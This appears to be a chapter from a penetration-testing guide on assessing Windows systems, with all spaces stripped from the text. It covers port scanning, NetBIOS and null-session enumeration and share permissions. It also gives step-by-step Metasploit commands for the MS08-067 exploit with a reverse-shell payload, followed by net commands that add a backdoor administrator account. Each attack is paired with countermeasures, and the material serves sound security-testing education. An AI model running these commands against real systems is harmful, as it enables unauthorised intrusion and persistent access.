WhenunsecuredWindows-basedsystemsareattacked,seriousthingscanhappentoatremendousnumberofcomputersaroundtheworld.

ChoosingToolsLiterallyhundredsofWindowshackingandtestingtoolsareavailable.Thekeyistofindasetoftoolsthatcandowhatyouneedandthatyou’recomfortableusing.

Manysecuritytools—includingsomeofthetoolsinthischapter—workwithonlycertainversionsofWindows.Themostrecentversionofeachtoolinthischaptershouldbecompatiblewithcurrently-supportedversionsofWindows(Windows7andWindowsServer2008R2andnewer),butyourmileagemayvary.

Ihavefoundthatthemoresecuritytoolsandother“poweruser”applicationsyouinstallinWindows—especiallyprogramsthattieintothenetworkdriversandTCP/IPstack—themoreunstableWindowsbecomes.I’mtalkingaboutslowperformance,generalinstabilityissues,andeventheoccasionalbluescreensofdeath.Unfortunately,oftentheonlyfixistoreinstallWindowsandallyourapplications.Afteryearsofrebuildingmytestingsystemseveryfewmonths,IfinallywisedupandboughtacopyofVMwareWorkstationandadedicatedcomputerthatIcanjunkupwithtestingtoolswithoutworryingaboutitaffectingmyabilitytogetmyotherworkdone.(Ah,thememoriesofthoseDOSandWindows3.xdayswhenthingsweremuchsimpler!)

FreeMicrosofttoolsYoucanusethefollowingfreeMicrosofttoolstotestyoursystemsforvariousweaknesses:

Built-inWindowsprogramsforNetBIOSandTCP/UDPserviceenumeration,suchasthesethree:

nbtstatforgatheringNetBIOSnametableinformationnetstatfordisplayingopenportsonthelocalWindowssystemnetforrunningvariousnetwork-basedcommands,includingviewingsharesonremoteWindowssystemsandaddinguseraccountsafteryougainaremotecommandpromptviaMetasploit

MicrosoftBaselineSecurityAnalyzer(MBSA)(https://technet.microsoft.com/en-us/security/cc184924.aspx)totestformissingpatchesandbasicWindowssecuritysettingsSysinternals(http://technet.microsoft.com/en-us/sysinternals/default.aspx)topoke,prod,andmonitorWindowsservices,processes,andresourcesbothlocallyandoverthenetwork

https://technet.microsoft.com/en-us/security/cc184924.aspx

http://technet.microsoft.com/en-us/sysinternals/default.aspx

All-in-oneassessmenttoolsAll-in-onetoolsperformawidevarietyofsecuritytests,includingthefollowing:

PortscanningOSfingerprintingBasicpasswordcrackingDetailedvulnerabilitymappingsofthevarioussecurityweaknessesthatthetoolsfindonyourWindowssystems

Itypicallyusethesetoolsinmyworkwithverygoodresults:

GFILanGuard(www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard)Nexpose(www.rapid7.com/products/nexpose)

Task-specifictoolsThefollowingtoolsperformmorespecifictasksforuncoveringWindows-relatedsecurityflaws.ThesetoolsprovidedetailedinsightintoyourWindowssystemsandprovideinformationthatyoumightnototherwisegetfromall-in-oneassessmenttools:

Metasploit(www.metasploit.com)forexploitingvulnerabilitiesthatsuchtoolsasNexposeandQualysdiscovertoobtainremotecommandprompts,addusers,setupremotebackdoors,andmuchmoreNetScanToolsPro(www.netscantools.com)forportscanning,pingsweeps,andshareenumerationSoftPerfectNetworkSecurityScanner(www.softperfect.com/products/networkscanner)forportscanningandshareenumerationTCPView(http://technet.microsoft.com/en-us/sysinternals/bb897437.aspx)toviewTCPandUDPsessioninformationWinfo(www.ntsecurity.nu/toolbox/winfo)fornullsessionenumerationtogathersuchconfigurationinformationassecuritypolicies,localuseraccounts,andshares

KeepinmindthatdisablingtheWindowsFirewall(orotherthird-partyfirewallthat’srunningonyourtestsystem)canhelpspeedthingsup.Dittoforanti-virussoftware—justbecareful.Ifpossible,runyoursecuritytestsusingadedicatedsystemorvirtualmachine,becausedoingsominimizesanyimpactyourtestresultsmayhaveontheotherworkyoudoonyourcomputer.






http://technet.microsoft.com/en-us/sysinternals/bb897437.aspx

http://www.ntsecurity.nu/toolbox/winfo/

GatheringInformationAboutYourWindowsVulnerabilities

WhenyouassessWindowsvulnerabilities,startbyscanningyourcomputerstoseewhatthebadguyscansee.

TheexploitsinthischapterwererunagainstWindowsfrominsideafirewall,ontheinternalnetwork.UnlessIpointoutotherwise,allthetestsinthischaptercanberunagainstallversionsoftheWindowsOS.Theattacksinthischapteraresignificantenoughtowarranttestingfor,regardlessofyourcurrentsetup.YourresultswillvaryfromminedependingonthespecificversionofWindows,patchlevels,andothersystemhardeningyou’vedone.

SystemscanningAfewstraightforwardprocessescanidentifyweaknessesinWindowssystems.

TestingStartgatheringinformationaboutyourWindowssystemsbyrunninganinitialportscan:

1. RunbasicscanstofindwhichportsareopenoneachWindowssystem:

ScanforTCPportswithaportscanningtool,suchasNetScanToolsPro.TheNetScanToolsProresultsshowninFigure12-1revealseveralpotentiallyvulnerableportsopenonaWindows7system,includingthoseforDNS(UDPport53);theever-popular—andeasilyhacked—NetBIOS(port139);andSQLServer(UDP1434).

2. PerformOSenumeration(suchasscanningforsharesandspecificOSversions)byusinganall-in-oneassessmenttool,suchasLanGuard.

Figure12-2showsaLanGuardscanthatrevealstheserverversion,vulnerabilities,openports,andmore.

Asyoucansee,GFIranksAutoRun-enabledandsource-routedpacketsfromarbitraryhostsas“High”SecurityVulnerabilities.IdiscussthesubjectofvulnerabilityprioritizationinChapter17.

IfyouneedtoquicklyidentifythespecificversionofWindowsthat’srunning,youcanuseNmap(http://nmap.org/download.html)withthe-Ooption,asshowninFigure12-3.

OtherOSfingerprintingtoolsareavailable,butI’vefoundNmaptobeone

http://nmap.org/download.html

ofthemostaccurate.

3. Determinepotentialsecurityvulnerabilities.

Thisissubjectiveandmightvaryfromsystemtosystem,butwhatyouwanttolookforareinterestingservicesandapplicationsandproceedfromthere.

Figure12-1:PortscanningaWindows7systemwithNetScanToolsPro.

Figure12-2:GatheringportandvulnerabilitydetailsfromaWindows-basedwebserverwithLanGuard.

Figure12-3:UsingNmaptodeterminetheWindowsversion.

CountermeasuresagainstsystemscanningYoucanpreventanexternalattackerormaliciousinternaluserfromgatheringcertaininformationaboutyourWindowssystemsbyimplementingthepropersecuritysettingsonyournetworkandontheWindowshosts.Youhavethefollowingoptions:

Useanetworkfirewallorwebapplicationfirewall(WAF)forsystemsrunningInternetInformationServices(IIS).UsetheWindowsFirewallorotherpersonalfirewallsoftwareoneachsystem.YouwanttoblocktheWindowsnetworkingportsforRPC(port135)andNetBIOS(ports137–139and445).Disableunnecessaryservicessothattheydon’tappearwhenaconnectionismade.

NetBIOSYoucangatherWindowsinformationbypokingaroundwithNetBIOS(NetworkBasicInput/OutputSystem)functionsandprograms.NetBIOSallowsapplicationstomakenetworkingcallsandcommunicatewithotherhostswithinaLAN.

TheseWindowsNetBIOSportscanbecompromisediftheyaren’tproperlysecured:

UDPportsfornetworkbrowsing:Port137(NetBIOSnameservices,alsoknownasWINS)Port138(NetBIOSdatagramservices)

TCPportsforServerMessageBlock(SMB):Port139(NetBIOSsessionservices,alsoknownasCIFS)Port445(runsSMBoverTCP/IPwithoutNetBIOS)

Hacks

ThehacksdescribedinthefollowingtwosectionscanbecarriedoutonunprotectedsystemsrunningNetBIOS.

Unauthenticatedenumeration

Whenyou’reperformingyourunauthenticatedenumerationtests,youcangatherconfigurationinformationaboutthelocalorremotesystemstwoways:

Usingall-in-onescanners,suchasLanGuardorNexposeUsingthenbtstatprogramthat’sbuiltintoWindows(nbtstatstandsforNetBIOSoverTCP/IPStatistics)

Figure12-4showsinformationthatyoucangatherfromaWindows7systemwithasimplenbtstatquery.

Figure12-4:UsingnbtstattogatherinformationonaWindows7system.

nbtstatshowstheremotecomputer’sNetBIOSnametable,whichyougatherbyusingthenbtstat-Acommand.Thisdisplaysthefollowinginformation:

ComputernameDomainnameComputer’sMACaddress

AnadvancedprogramsuchasNexposeisn’tnecessarytogatherthisbasicinformationfromaWindowssystem.However,thegraphicalinterfaceofferedbycommercialsoftwaresuchasthispresentsitsfindingsinaprettierfashionandisoftenmucheasiertouse.Additionally,youhavethebenefitofgatheringtheinformationyouneedwithonetool.

Shares

Windowsusesnetworksharestosharecertainfoldersordrivesonthesystemsoother

userscanaccessthemacrossthenetwork.Sharesareeasytosetupandprovideagreatwaytosharefileswithotherusersonthenetworkwithouthavingtoinvolveaserver.However,they’reoftenmisconfigured,allowingusers,malware,andexternalattackersthathavemadetheirwayinsidethenetworktoaccessinformationtheyshouldn’tbeabletogettootherwise.YoucansearchforWindowsnetworksharesbyusingtheShareFindertoolbuiltintoLanGuard.ThistoolscansanentirerangeofIPaddresses,lookingforWindowsshares,asshowninFigure12-5.

Figure12-5:UsingLanGuardtoscanyournetworkforWindowsshares.

TheEveryonegrouphasfullshareandfileaccesstotheLifeandHealthshareontheTHINKPADhost.Iseesituationslikethisallthetimewheresomeonesharestheirlocaldrivesootherscanaccessit.Theproblemistheyoftenforgettoremovethepermissionsandleaveagapingholeforasecuritybreach.

ThesharesdisplayedinFigure12-5arejustwhatmaliciousinsidersarelookingforbecausethesharenamesgiveahintofwhattypeoffilesmightbeaccessibleiftheyconnecttotheshares.Afterthosewithillintentdiscoversuchshares,they’relikelytodigalittlefurthertoseewhethertheycanbrowseandaccessthefileswithintheshares.IcoversharesandrootingoutsensitiveinformationonnetworkshareslaterinthischapterandinChapter16.

CountermeasuresagainstNetBIOSattacksYoucanimplementthefollowingsecuritycountermeasurestominimizeNetBIOSandNetBIOSoverTCP/IPattacksonyourWindowssystems:

Useanetworkfirewall.

UseWindowsFirewallorsomeotherpersonalfirewallsoftwareoneachsystem.DisableWindowsFileandPrinterSharingwhichcanbefoundintheWindowsControlPanel.Forexample,inWindows8.1it’slocatedunderControlPanel,NetworkandInternet,NetworkandSharingCenter,Changeadvancedsharingsettings.Educateyourusersonthedangersofenablingfileshareswithimpropersecurityaccesscontrolsforeveryonetoaccess.IcovertheserisksfurtherinthischapterbelowaswellasinChapter16.They’renodoubtoneofthegreatestrisksonmostnetworkstoday.

Hiddenshares—thosewithadollarsign($)appendedtotheendofthesharename—don’treallyhelphidethesharename.AnyofthetoolsI’vementionedcanseerightthroughthisformofsecuritybyobscurity.Infact,ifyoucomeacrosssuchshares,you’llwanttolookatthemmoreclosely,asausermaybetryingtohidesomethingorotherwiseknowsthattheinformationontheshareissensitiveanddoesn’twanttodrawattentiontoit.

DetectingNullSessionsAwell-knownvulnerabilitywithinWindowscanmapananonymousconnection(ornullsession)toahiddensharecalledIPC$(whichstandsforinterprocesscommunication).Thisattackmethodcanbeusedto

GatherWindowshostconfigurationinformation,suchasuserIDsandsharenames.Editpartsoftheremotecomputer’sregistry.

AlthoughWindowsServer2008andupaswellasWindows7,Windows8,andWindows10don’tallownullsessionconnectionsbydefault,Ioftencomeacrosssystemsthathavebeenconfiguredinsuchaway(oftenbydisablingWindowsFirewall),thisvulnerabilitycanstillcauseproblemsonyournetwork.

AlthoughlaterversionsofWindowsaremuchmoresecurethantheirpredecessors,don’tassumethatall’swellinWindows-land.Ican’ttellyouhowmanytimesIseesupposedlysecureWindowsinstallations“tweaked”toaccommodateanapplicationorotherbusinessneedthathappenstofacilitateexploitation.

MappingFollowthesestepsforeachWindowscomputertowhichyouwanttomapanullsession:

1. Formatthebasicnetcommand,likethis:netuse\\host_name_or_IP_address\ipc$"""/user:"

Thenetcommandtomapnullsessionsrequirestheseparameters:

net(thebuilt-inWindowsnetworkcommand)followedbytheusecommandTheIPaddressorhostnameofthesystemtowhichyouwanttomapanullconnection

Ablankpasswordandusername

Theblanksarewhyit’scalledanullconnection.

2. PressEntertomaketheconnection.

Figure12-6showsanexampleofthecompletecommandwhenmappinganullsession.Afteryoumapthenullsession,youshouldseethemessageThecommandcompletedsuccessfully.

Figure12-6:MappinganullsessiontoavulnerableWindowssystem.

Toconfirmthatthesessionsaremapped,enterthiscommandatthecommandprompt:

netuse

AsshowninFigure12-6,youshouldseethemappingstotheIPC$shareoneachcomputertowhichyou’reconnected.

GleaninginformationWithanullsessionconnection,youcanuseotherutilitiestogathercriticalWindowsinformationremotely.Dozensoftoolscangatherthistypeofinformation.

You—likeahacker—cantaketheoutputoftheseenumerationprogramsandattempt(asanunauthorizeduser)to

Crackthepasswordsoftheusersfound.(SeeChapter8formoreonpasswordcracking.)Mapdrivestoeachcomputer’snetworkshares.

YoucanusethefollowingapplicationsforsystemenumerationagainstserverversionsofWindowspriortoServer2003aswellasWindowsXP.Don’tlaugh,IstillseethesearchaicversionsofWindowsrunning.

netviewThenetviewcommand(seeFigure12-7)showssharesthattheWindowshosthasavailable.Youcanusetheoutputofthisprogramtoseeinformationthattheserverisadvertisingtotheworldandwhatcanbedonewithit,includingthefollowing:

Shareinformationthatanattackercanusetoexploityoursystems,suchasmappingdrivesandcrackingsharepasswords.Sharepermissionsthatmightneedtoberemoved,suchasthepermissionfortheEveryonegroup,toatleastseetheshareonolderWindows2000–basedsystemsifyouhavethoseonyournetwork.

Figure12-7:netviewdisplaysdrivesharesonaremoteWindowshost.

ConfigurationanduserinformationWinfo(www.ntsecurity.nu/toolbox/winfo)andDumpSec(www.systemtools.com/somarsoft/index.html)cangatherusefulinformationaboutusersandconfigurations,suchas

WindowsdomaintowhichthesystembelongsSecuritypolicysettingsLocalusernamesDriveshares

Yourpreferencemightdependonwhetheryoulikegraphicalinterfacesoracommandline:

Winfoisacommand-linetool.

BecauseWinfoisacommand-linetool,youcancreatebatch(script)filesthatautomatetheenumerationprocess.ThefollowingisanabbreviatedversionofWinfo’soutputofaWindowsNTserver,butyoucancollectthesameinformationfromotherWindowssystems:

Winfo2.0-copyright(c)1999-2003,ArneVidstrom

-http://www.ntsecurity.nu/toolbox/winfo/

SYSTEMINFORMATION:

-OSversion:4.0

PASSWORDPOLICY:

-Timebetweenendoflogontimeandforcedlogoff:Noforcedlogoff

-Maximumpasswordage:42days

-Minimumpasswordage:0days

-Passwordhistorylength:0passwords

-Minimumpasswordlength:0characters

USERACCOUNTS:

*Administrator

(Thisaccountisthebuilt-inadministratoraccount)

*doctorx

*Guest

(Thisaccountisthebuilt-inguestaccount)

*IUSR_WINNT

*kbeaver

*nikki

SHARES:

*ADMIN$


http://www.systemtools.com/somarsoft/index.html


-Type:SpecialsharereservedforIPCoradministrativeshare

*IPC$

-Type:Unknown

*Here2Bhacked

-Type:Diskdrive

*C$

-Type:SpecialsharereservedforIPCoradministrativeshare

*Finance

-Type:Diskdrive

*HR

-Type:Diskdrive

ThisinformationcannotbegleanedfromadefaultinstallationofWindowsServer2003orWindowsXPandlaterversionsofWindows—onlyfromsupportedsystems.

YoucanperusetheoutputofsuchtoolsforuserIDsthatdon’tbelongonyoursystem,suchas

Ex-employeeaccountsthathaven’tbeendisabledPotentialbackdooraccountsthatahackermighthavecreated

Ifattackersgetthisinformation,theycanattempttoexploitpotentiallyweakpasswordsandloginasthoseusers.

Countermeasuresagainstnullsessionhacks

Ifitmakesgoodbusinesssenseandthetimingisright,upgradetothemoresecureWindowsServer2012orWindowsServer2016aswellasWindows7orWindows10.Theydon’thavethevulnerabilitiesdescribedinthefollowinglist.

Youcaneasilypreventnullsessionconnectionhacksbyimplementingoneormoreofthefollowingsecuritymeasures:

BlockNetBIOSonyourWindowsserverbypreventingtheseTCPportsfrompassingthroughyournetworkfirewallorpersonalfirewall:

139(NetBIOSsessionsservices)445(runsSMBoverTCP/IPwithoutNetBIOS)

DisableFileandPrinterSharingforMicrosoftNetworksinthePropertiestabofthemachine’snetworkconnectionforthosesystemsthatdon’tneedit.

Restrictanonymousconnectionstothesystem.IfyouhappentohaveanyWindowsNTandWindows2000systemsleftinyourenvironment(hopefullynot!),youcansetHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymoustoaDWORDvalueasfollows:

None:Thisisthedefaultsetting.RelyonDefaultPermissions(Setting0):Thissettingallowsthedefaultnullsessionconnections.DoNotAllowEnumerationofSAMAccountsandShares(Setting1):Thisisthemediumsecuritylevelsetting.ThissettingstillallowsnullsessionstobemappedtoIPC$,enablingsuchtoolsasWalksamtogarnerinformationfromthesystem.NoAccesswithoutExplicitAnonymousPermissions(Setting2):Thishighsecuritysettingpreventsnullsessionconnectionsandsystemenumeration.

Highsecuritycreatesproblemsfordomaincontrollercommunicationandnetworkbrowsing,sobecareful!Youcanendupcripplingthenetwork.

MicrosoftKnowledgeBaseArticle246261coversthecaveatsofusingthehighsecuritysettingforRestrictAnonymous.It’savailableonthewebathttp://support.microsoft.com/default.aspx?scid=KB;en-us;246261.

ForlaterversionsofWindows,suchasWindowsServer2008R2andWindows7,ensurethattheNetworkAccessanonymouscomponentsofthelocalorgroupsecuritypolicyaresetasshowninFigure12-8.

Figure12-8:DefaultlocalsecuritypolicysettingsinWindows7thatrestrictnullsessionconnections.

http://support.microsoft.com/default.aspx?scid=KB;en-us;246261

CheckingSharePermissionsWindowssharesaretheavailablenetworkdrivesthatshowupwhenusersbrowsethenetworkinMyNetworkPlaces.Windowssharesareoftenmisconfigured,allowingmorepeopletohaveaccesstothemthantheyshould.Thecasualbrowsercanexploitthissecurityvulnerability,butamaliciousinsidergainingunauthorizedaccesstoaWindowssystemcanresultinserioussecurityandcomplianceconsequences,includingtheleakageofsensitiveinformationandeventhecorruptionordeletionofcriticalfiles.

WindowsdefaultsThedefaultsharepermissiondependsontheWindowssystemversion.

Windows2000/NTWhencreatingsharesinWindowsNTandWindows2000,thegroupEveryoneisgivenFullControlaccessinthesharebydefaultforallfilesto:

BrowsefilesReadfilesWritefiles

YoushouldnolongerhavetheseversionsofWindowsrunningonyournetworkbutIdostillseetheseversionsoutthere.

AnyonewhomapstotheIPC$connectionwithanullsession(asdescribedintheprevioussection,“NullSessions”)isautomaticallymadepartoftheEveryonegroup.ThismeansthatremotehackerscanautomaticallygainBrowse,Read,andWriteaccesstoaWindowsNTorWindows2000serverafterestablishinganullsession.

WindowsXPandnewerInWindowsXPandnewer(WindowsServer2008R2,Windows7,andsoon),theEveryonegroupisgivenonlyReadaccesstoshares.ThisisdefinitelyanimprovementoverthedefaultsinWindows2000andWindowsNT.However,youstillmighthavesituationsinwhichyoudon’twanttheEveryonegrouptoevenhaveReadaccesstoashare.

Sharepermissionsaredifferentfromfilepermissions.Whencreatingshares,youhavetosetboth.IncurrentversionsofWindows,thishelpscreatehoopsforcasualuserstojumpthroughanddiscouragesharecreation,butit’snotfoolproof.UnlessyouhaveyourWindowsdesktopscompletelylockeddown,userscanstill

shareouttheirfilesatwill.

TestingAssessingyoursharepermissionsisagoodwaytogetanoverallviewofwhocanaccesswhat.Thistestingshowshowvulnerableyournetworkshares—andsensitiveinformation—canbe.Youcanfindshareswithdefaultpermissionsandunnecessaryaccessrightsenabled.Trustme;they’reeverywhere!

ThebestwaytotestforshareweaknessesistologintotheWindowssystemviaastandardlocalordomainuserwithnospecialprivilegesandrunanenumerationprogramsoyoucanseewhohasaccesstowhat.

AsIoutlinedearlier,LanGuardhasbuilt-insharefindercapabilitiesforuncoveringunprotectedshares,theoptionsforwhichareshowninFigure12-9.

Figure12-9:LanGuard’sShareFinderprofileseeksoutWindowsshares.

IoutlinemoredetailsonuncoveringsensitiveinformationinunstructuredfilesonnetworksharesandotherstoragesystemsinChapter16.

ExploitingMissingPatchesIt’sonethingtopokeandprodWindowstofindvulnerabilitiesthatmighteventuallyleadtosomegoodinformation—maybesystemaccess.However,it’squiteanothertostumbleacrossavulnerabilitythatwillprovideyouwithfullandcompletesystemaccess—allwithin10minutes.Well,it’snotanemptythreatforsomeonetorun“arbitrarycode”onasystemthatmayleadtoavulnerabilityexploitation.WithsuchtoolsasMetasploit,allittakesisonemissingpatchononesystemtogainaccessanddemonstratehowtheentirenetworkcanbecompromised.Amissingpatchlikethisisthecriminalhacker’spotofgold.

Evenwithallthewrittensecuritypoliciesandfancypatchmanagementtools,oneverynetworkIcomeacross,numerousWindowssystemsdon’thaveallthepatchesapplied.Theremaybeareasonforitsuchasfalsepositivesfromvulnerabilityscannersorthemissingpatcheshavedeemedtobeacceptablerisks.Evenifyouthinkallyoursystemshavethelatestpatchesinstalled,youhavetobesure.It’swhatsecurityassessmentsIareallabout:Trustbutverify.

Beforeyougo’sploitin’vulnerabilitieswithMetasploit,it’sveryimportanttoknowthatyou’reventuringintosensitiveterritory.Notonlycanyougainfull,unauthorizedaccesstosensitivesystems,butyoucanalsoputthesystemsbeingtestedintoastatewheretheycanhangorreboot.So,readeachexploit’sdocumentationandproceedwithcaution.

Beforeyoucanexploitamissingpatchorrelatedvulnerability,youhavetofirstfindoutwhat’savailableforexploitation.ThebestwaytogoaboutdoingthisistouseatoolsuchasNexposeorLanGuardtofindthem.I’vefoundNexposetobeverygoodatrootingoutsuchvulnerabilitiesevenasanunauthenticateduseronthenetwork.Figure12-10showsNexposescanresultsofaWindowsserversystemthathasthenastyWindowsPlugandPlayRemoteCodeExecutionvulnerability(MS08-067)from2008thatIstillseequiteoften.

Figure12-10:ExploitablevulnerabilityfoundbyNexpose.

Windows10securityWithallthevulnerabilitiesinWindows,it’ssometimestemptingtojumpshipandmovetoLinuxorMacOSX.Butnotsofast.MicrosoftmadegreatstrideswithsecurityinWindows7andWindows8.x—bothofwhichhavelaidthegroundworkforwhat’snowthemuchmoresecureWindows10.

BuildingonWindows8.x,MicrosofthasmadeevenmoreimprovementsinWindows10beyondtherestoredstartbuttonandstartmenu,includingthefollowing:

WindowsUpdateforBusinessthatprovidesgreatercontroloverenterpriseWindowspatchmanagement.

ScheduledrestartsforWindowspatchestoperhapsnudgeusersalong.

WindowsHelloforuserauthenticationsupportingexistingfingerprintscannersandotherbiometricdevicessuchasfaceandirisscanners.

Finally,Windows10isevenfasterthanWindows8—whichisreallynice,especiallyifyouusetheOSforsecuritytesting.Itsspeedmightalsobejustwhatyouneedtoputanendtousersdisablingtheirantivirussoftwaretospeedtheircomputersup—whichhappensquiteoften.

HavingrunvariousscansandattacksagainstWindows10systems,I’vefoundthatit’sadarnsecuredefaultinstallation.But,thatdoesn’tmeanWindows10isimmunetoattackandabuse.Aslongasthehumanelementisinvolvedinsoftwaredevelopment,networkadministration,andend-userfunctions,peoplewillcontinuetomakemistakesthatleavewindowsopen(punintended)forthebadguystosneakthroughandcarryouttheirattacks.Thekeyistomakesureyouneverletyourguarddown!

UsingMetasploitAfteryoufindavulnerability,thenextstepistoexploitit.Inthisexample,IuseMetasploitFramework(anopensourcetoolownedandmaintainedbyRapid7)andobtainaremotecommandpromptonthevulnerableserver.Here’show:

1. DownloadandinstallMetasploit(currentlyatversion4.11)fromwww.rapid7.com/products/metasploit/download.jsp.

IusetheWindowsversion;allyouhavetodoisdownloadandruntheexecutable.

2. Aftertheinstallationiscomplete,runtheMetasploitConsole,whichisMetasploit’smainconsole.

There’salsoaweb-basedversionofMetasploitthatyoucanaccessthroughyourbrowser(MetasploitWebUI),butIprefertheconsoleinterface.

YouseeascreensimilartotheoneshowninFigure12-11.

3. Entertheexploityouwishtorun.Forexample,ifyouwanttoruntheMicrosoftMS08-067PlugandPlayexploit,enterthefollowing:

useexploit/windows/smb/ms08_067_netapi

4. Entertheremotehost(RHOST)youwishtotargetandtheIPaddressofthelocalhost(LHOST)you’reonwiththefollowingcommand:

setRHOSTip_address

setLHOSTip_address

5. Setthetargetoperatingsystem(usually0forautomatictargeting)withthefollowingcommand:

setTARGET0

http://www.rapid7.com/products/metasploit/download.jsp

6. Setthepayload(exploitdata)thatyouwanttoexecute.Itypicallychoosewindows/shell_reverse_tcpasitprovidesaremotecommandpromptonthesystembeingexploited.

Figure12-12showswhatyoushouldhavedisplayedintheMetasploitconsolescreen.

7. ThefinalstepistosimplyenterexploitintheMetasploitconsole.ThiscommandinvokesthefinalstepwhereMetasploitdeliversthepayloadtothetargetsystem.Assumingtheexploitissuccessful,youshouldbepresentedacommandpromptwhereyoucanentertypicalDOScommandssuchas‘dir’asshowninFigure12-13.

Figure12-11:ThemainMetasploitconsole.

Figure12-12:Metasploitoptionstoobtainaremotecommandpromptonthetargetsystem.

Figure12-13:RemotecommandpromptontargetsystemobtainedbyexploitingamissingWindowspatch.

Inthisironicexample,aMacisrunningWindowsviatheBootCampsoftware.Inow“own”thesystemandamabletodowhateverIwant.Forexample,onethingIcommonlydoisaddauseraccounttotheexploitedsystem.YoucanactuallydothiswithinMetasploit(viatheadduserpayloads),butIprefertodoitonmyownsoIcan

getscreenshotsofmyactions.Toaddauser,simplyenternetuserusernamepassword/addattheMetasploitcommandprompt.

Next,Iaddtheusertothelocaladministratorsgroupbyenteringnetlocalgroupadministratorsusername/addattheMetasploitcommandprompt.YoucanthenlogintotheremotesystembymappingadrivetotheC$shareorbyconnectingviaRemoteDesktop.

Ifyouchoosetoaddauseraccountduringthisphase,besuretoremoveitwhenyoufinish.Otherwise,youcancreateanothervulnerabilityonthesystem—especiallyiftheaccounthasaweakpassword.Chapter3coversrelatedissues,suchastheneedforacontractwhenperformingyourtesting.Youwanttomakesureyou’vecoveredyourself.

Allinall,thisishackingatitsfinest!

ThreeuniqueversionsofMetasploitareavailablefromRapid7.ThefreeeditionoutlinedintheprecedingstepsiscalledMetasploitFramework.Itmaybeallyouneedifanoccasionalscreenshotofremoteaccessorsimilarissufficientforyourtestingpurposes.There’salsoMetasploitCommunitywhichisaccessibleviaawebuserinterfaceandintendedforsmallnetworks.Finally,there’safull-blowncommercialversioncalledMetasploitProfortheserioussecurityprofessional.MetasploitProaddsfeaturesforsocialengineering,webapplicationscanning,anddetailedreporting.

MetasploitPro’sOverviewscreenisshowninFigure12-14.NotetheworkflowfeaturesintheQuickStartWizardsiconsincludingQuickPenTest,PhishingCampaign,andWebAppTest.It’sawell-thought-outinterfacethattakesthepainoutoftraditionalsecurityscanning,exploitation,andreporting,whichisespeciallyusefulforthelesstechnicalITprofessional.

Figure12-14:MetasploitPro’sgraphicalinterfaceprovidesbroadsecuritytestingcapabilitiesincludingphishingandwebapplicationsecuritychecks.

MetasploitProprovidesyouwiththeabilitytoimportscannerfindings(typicallyXMLfiles)fromthird-partyvulnerabilityscannerssuchasAcunetixWebVulnerabilityScanner,Netsparker,andNexpose.SimplyclickthenameofyourprojectintheProjectListingsection(orcreateanewonebyselectingNewProject)andthenclickingtheImportbutton.Afterthescandatafileisimported,youcanclicktheVulnerabilitiestabandseealltheoriginalvulnerabilityscannerfindings.Toexploitoneofthevulnerabilities(assumingit’sasupportedexploitinMetasploitPro),simplyclickthefindingundertheNamecolumnandyou’llbepresentedwithanewpagethatallowsyoutoclickExploitandexecutetheflaw,asshowninFigure12-15.

Figure12-15:StartingtheexploitprocessinMetasploitProisassimpleasimportingyourscannerfindingsandclickingExploit.

KeepinmindthatI’vedemonstratedonlyafractionofwhatMetasploitFrameworkandMetasploitProcando.Ihighlyrecommendyoudownloadoneorbothandfamiliarizeyourselfwiththesetools.Numerousresourcesareavailableatwww.metasploit.com/helpthatcanhelpyoutakeyourskillsettothenextlevel.ThepowerofMetasploitisunbelievableallbyitself.Combineitwiththeexploitcodethat’scontinuallyupdatedatsitessuchasOffensiveSecurity’sExploitsDatabase(www.exploit-db.com),andyouhavepracticallyeverythingyouneedifyouchoosetodrilldowntothatlevelofexploitationinyoursecuritytesting.

CountermeasuresagainstmissingpatchvulnerabilityexploitsPatchyoursystems—boththeWindowsOSandanyMicrosoftorthird-partyapplicationsrunningonthem.Iknowit’saloteasiersaidthandone.Seriously,that’sallthereistoit.CombinethatwiththeotherhardeningrecommendationsIprovideinthischapter,andyouhaveaprettydarnedsecureWindowsenvironment.

Togetyourarmsaroundthepatchingprocess,youhavetoautomateitwhereveryoucan.YoucanuseWindowsUpdate—orbetteryet—WindowsServerUpdateServices(WSUS)forMicrosoft-centricpatches,whichcanbefoundathttp://technet.microsoft.com/en-us/wsus/default.aspx.Ican’tstressenoughhowyouneedtogetyourthird-partypatchesforAdobe,Java,andsoonundercontrol.Ifyou’relookingforacommercialalternative,checkoutGFILanGuard’spatchmanagementfeatures(www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard)andLumensionPatchandRemediation

http://www.metasploit.com/help/

http://www.exploit-db.com/

http://technet.microsoft.com/en-us/wsus/default.aspx


(www.lumension.com/vulnerability-management/patch-management-software.aspx).Icoverpatchingmorein-depthinChapter18.

http://www.lumension.com/vulnerability-management/patch-management-software.aspx

RunningAuthenticatedScansAnothertestyoucanrunagainstyourWindowssystemsisan“authenticated”scan—essentiallylookingforvulnerabilitiesasatrusteduser.Ifindthesetypesofteststobeverybeneficialbecausetheyoftenhighlightsystemproblemsandevenoperationalsecurityweaknesses(suchaspoorchangemanagementprocesses,weakpatchmanagement,andlackofinformationclassification)thatwouldneverbediscoveredotherwise.

Atrustedinsiderwhohasphysicalaccesstoyournetworkandtherighttoolscanexploitvulnerabilitiesevenmoreeasily.ThisisespeciallytrueifnointernalaccesscontrollistsorIPSisinplaceand/oramalwareinfectionoccurs.

AwaytolookforWindowsweaknesseswhileyou’reloggedin(thatis,throughtheeyesofamaliciousinsider)isbyusingsomeofthevulnerabilityscanningtoolsI’vementioned,suchasLanGuardandNexpose.Figure12-16showsthenice(andrare)featurethatNexposehastotestyourlogincredentialsbeforegettingvulnerabilityscansstarted.Beingabletovalidatelogincredentialsbeforeyoustartyourscanscansaveanamazingamountoftime,hassle,andmoney.

Figure12-16:TestinglogincredentialsbeforerunninganauthenticatedscanwithNexposetoseewhattrustedinsiderscanseeandexploit.

Irecommendrunningauthenticatedscansasadomainorlocaladministrator.Thiswillshowyouthegreatestamountofsecurityflawsaswellaswhohasaccesstowhatintheeventthatavulnerabilityispresent.You’lllikelybesurprisedtofindoutthatalarge

portionofvulnerabilities,suchasthoselistedinFigure12-16,areaccessibleviaastandarduseraccount.Youdon’tnecessarilyneedtorunauthenticatedscanseverytimeyoutestforsecurityflaws,butdoingsoatleastonceortwiceperyearisnotabadidea.

